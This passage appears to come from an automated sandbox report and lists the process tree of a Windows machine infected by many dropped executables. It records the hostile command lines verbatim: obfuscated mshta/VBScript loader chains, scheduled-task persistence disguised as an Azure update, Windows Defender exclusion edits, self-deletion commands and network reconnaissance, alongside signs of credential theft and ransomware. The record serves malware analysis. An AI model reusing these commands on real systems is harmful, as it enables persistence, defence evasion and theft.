                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:6056
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                              PID:1220
                                                                                            • C:\Users\Admin\AppData\Local\Temp\142D.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\142D.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:3688
                                                                                            • C:\Users\Admin\AppData\Local\Temp\3E6B.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\3E6B.exe
                                                                                              1⤵
                                                                                              • Loads dropped DLL
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5804
                                                                                            • C:\Users\Admin\AppData\Local\Temp\727C.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\727C.exe
                                                                                              1⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5128
                                                                                              • C:\Users\Admin\AppData\Local\Temp\727C.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\727C.exe
                                                                                                2⤵
                                                                                                • Loads dropped DLL
                                                                                                • Accesses Microsoft Outlook accounts
                                                                                                • Accesses Microsoft Outlook profiles
                                                                                                • outlook_office_path
                                                                                                • outlook_win_path
                                                                                                PID:1528
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\727C.exe"
                                                                                                  3⤵
                                                                                                    PID:5288
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout /T 10 /NOBREAK
                                                                                                      4⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:5520
                                                                                              • C:\Users\Admin\AppData\Local\Temp\945D.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\945D.exe
                                                                                                1⤵
                                                                                                  PID:4408
                                                                                                • C:\Windows\system32\regsvr32.exe
                                                                                                  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\C36D.dll
                                                                                                  1⤵
                                                                                                    PID:2232
                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                      /s C:\Users\Admin\AppData\Local\Temp\C36D.dll
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5412
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        3⤵
                                                                                                          PID:2160
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn ddqdlcbnv /tr "regsvr32.exe -s \"C:\Users\Admin\AppData\Local\Temp\C36D.dll\"" /SC ONCE /Z /ST 10:46 /ET 10:58
                                                                                                            4⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:3196
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D725.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\D725.exe
                                                                                                      1⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:5632
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D725.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\D725.exe
                                                                                                        2⤵
                                                                                                        • Adds Run key to start application
                                                                                                        PID:5360
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls "C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                          3⤵
                                                                                                          • Modifies file permissions
                                                                                                          PID:5616
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D725.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\D725.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                          3⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5264
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D725.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\D725.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                            4⤵
                                                                                                            • Modifies extensions of user files
                                                                                                            PID:2372
                                                                                                            • C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe
                                                                                                              "C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"
                                                                                                              5⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:1996
                                                                                                              • C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe
                                                                                                                "C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"
                                                                                                                6⤵
                                                                                                                  PID:5464
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                    7⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:4304
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10A4.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\10A4.exe
                                                                                                        1⤵
                                                                                                          PID:4992
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\new.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\new.exe" -update "10A4.exe"
                                                                                                            2⤵
                                                                                                              PID:5348
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10A4.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10A4.exe" -updated
                                                                                                                3⤵
                                                                                                                • Adds Run key to start application
                                                                                                                PID:4792
                                                                                                                • C:\Users\Admin\AppData\Roaming\Absolute\module.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Absolute\module.exe"
                                                                                                                  4⤵
                                                                                                                    PID:5044
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\new.exe"
                                                                                                                  3⤵
                                                                                                                    PID:5196
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping 1.1.1.1 -n 1 -w 3000
                                                                                                                      4⤵
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:2904
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2084.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\2084.exe
                                                                                                                1⤵
                                                                                                                  PID:1368
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\32E4.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\32E4.exe
                                                                                                                  1⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:4792
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 32E4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\32E4.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                    2⤵
                                                                                                                      PID:6112
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /im 32E4.exe /f
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:6108
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout /t 6
                                                                                                                        3⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:6100
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4F56.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4F56.exe
                                                                                                                    1⤵
                                                                                                                      PID:4132
                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                        "C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\4F56.exe"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\4F56.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )
                                                                                                                        2⤵
                                                                                                                          PID:5468
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\4F56.exe"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\4F56.exe") do taskkill -iM "%~Nxq" -f
                                                                                                                            3⤵
                                                                                                                              PID:5404
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE
                                                                                                                                ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw
                                                                                                                                4⤵
                                                                                                                                  PID:1860
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )
                                                                                                                                    5⤵
                                                                                                                                      PID:740
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f
                                                                                                                                        6⤵
                                                                                                                                          PID:5012
                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                        "C:\Windows\System32\mshta.exe" vBsCripT: ClOSe ( creAteObJecT ( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q * " , 0 , tRUe ) )
                                                                                                                                        5⤵
                                                                                                                                          PID:5148
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = "MZ" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G+ TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q *
                                                                                                                                            6⤵
                                                                                                                                              PID:3704
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" ECho "
                                                                                                                                                7⤵
                                                                                                                                                  PID:5024
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5436
                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    msiexec -y ..\UFTH.2~Z
                                                                                                                                                    7⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:5760
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill -iM "4F56.exe" -f
                                                                                                                                              4⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:3328
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\586F.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\586F.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5752
                                                                                                                                        • \??\c:\windows\system32\regsvr32.exe
                                                                                                                                          regsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"
                                                                                                                                          1⤵
                                                                                                                                            PID:2232
                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                              -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"
                                                                                                                                              2⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:5228
                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                3⤵
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:4368
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\ProgramData\Microsoft\Omaeirficyei" /d "0"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:956
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Pumao" /d "0"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5568
                                                                                                                                                    • C:\Windows\SysWOW64\whoami.exe
                                                                                                                                                      whoami /all
                                                                                                                                                      4⤵
                                                                                                                                                        PID:6832
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /c set
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1796
                                                                                                                                                        • C:\Windows\SysWOW64\arp.exe
                                                                                                                                                          arp -a
                                                                                                                                                          4⤵
                                                                                                                                                            PID:6580
                                                                                                                                                          • C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                            ipconfig /all
                                                                                                                                                            4⤵
                                                                                                                                                            • Gathers network information
                                                                                                                                                            PID:6188
                                                                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                                                                            net view /all
                                                                                                                                                            4⤵
                                                                                                                                                            • Discovers systems in the same network
                                                                                                                                                            PID:6964
                                                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                            nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
                                                                                                                                                            4⤵
                                                                                                                                                              PID:6104
                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                              net share
                                                                                                                                                              4⤵
                                                                                                                                                                PID:6544
                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                  C:\Windows\system32\net1 share
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:6596
                                                                                                                                                                • C:\Windows\SysWOW64\route.exe
                                                                                                                                                                  route print
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:6492
                                                                                                                                                                  • C:\Windows\SysWOW64\netstat.exe
                                                                                                                                                                    netstat -nao
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Gathers network information
                                                                                                                                                                    PID:6912
                                                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                    net localgroup
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:6996
                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                        C:\Windows\system32\net1 localgroup
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:7120
                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                        regsvr32.exe -s "C:\ProgramData\Microsoft\Omaeirficyei\ewdvnymudi.dll"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                        PID:6868
                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          PID:6520
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:3084
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:500
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:3024
                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    PID:4212
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:5804
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5780
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:5540
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4372
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:5376
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:792
                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          PID:5488
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:4792
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:6072
                                                                                                                                                                          • \??\c:\windows\system\svchost.exe
                                                                                                                                                                            c:\windows\system\svchost.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            PID:6012
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\ghdhvts
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\ghdhvts
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:400
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\ghdhvts
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\ghdhvts
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                              PID:224
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\rvdhvts
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\rvdhvts
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                            PID:904
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:5672
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:1200
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:520
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              PID:6232
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:6392
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:6564
                                                                                                                                                                              • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:6608
                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4048
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:7076
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5712
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:7112
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:7080
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        PID:6000
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:7084
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:7424
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:7200
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:7540
                                                                                                                                                                                        • \??\c:\windows\system32\regsvr32.exe
                                                                                                                                                                                          regsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:7716
                                                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:7732
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:7744
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:7780
